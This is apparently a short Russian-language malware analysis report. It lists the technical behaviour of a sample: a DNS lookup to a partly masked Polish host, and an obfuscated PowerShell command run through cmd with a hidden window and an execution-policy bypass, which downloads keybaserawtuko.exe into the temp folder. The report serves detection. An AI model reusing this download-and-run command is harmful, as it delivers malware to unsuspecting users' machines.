Техническая информация
- http://ku####ia.webd.pl/donramirez/keybaserawtuko.exe как %temp%\\keybaserawtuko.exe
- '<SYSTEM32>\cmd.exe' /c POwershelL.Exe -WindowStYLe hIdDeN -NoProFilE -ExECUTiOnpoliCY bypAss (NeW-OBjeCT SysTeM.NEt.WEbClIenT).DOWnlOaDFIle('http://ku####ia.webd.pl/DONRAMIREZ/KEYBASERAWTUKO.exe','%TEMP%\\KEYBASER...
- DNS ASK ku####ia.webd.pl
- '<SYSTEM32>\cmd.exe' /c POwershelL.Exe -WindowStYLe hIdDeN -NoProFilE -ExECUTiOnpoliCY bypAss (NeW-OBjeCT SysTeM.NEt.WEbClIenT).DOWnlOaDFIle('http://ku####ia.webd.pl/DONRAMIREZ/KEYBASERAWTUKO.exe','%TEMP%\\KEYBASER...' (со скрытым окном)